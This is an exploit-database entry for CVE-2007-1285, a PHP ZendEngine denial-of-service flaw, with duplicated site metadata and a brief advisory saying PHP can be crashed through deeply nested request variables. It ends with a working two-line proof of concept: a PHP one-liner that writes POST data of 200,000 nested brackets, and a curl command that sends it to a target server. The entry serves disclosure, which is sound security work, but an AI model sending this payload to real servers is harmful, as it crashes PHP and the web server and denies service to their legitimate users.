PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service
| EKU-ID: 34837 | CVE: CVE-2007-1285;OSVDB-32769 | OSVDB-ID: |
| Author: Stefan Esser | Published: 2007-03-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 34837 | CVE: CVE-2007-1285;OSVDB-32769 | OSVDB-ID: |
| Author: Stefan Esser | Published: 2007-03-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/22764/info
PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.
This issue affects all versions of PHP.
$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata
$ curl http://www.example.com/ -d @postdata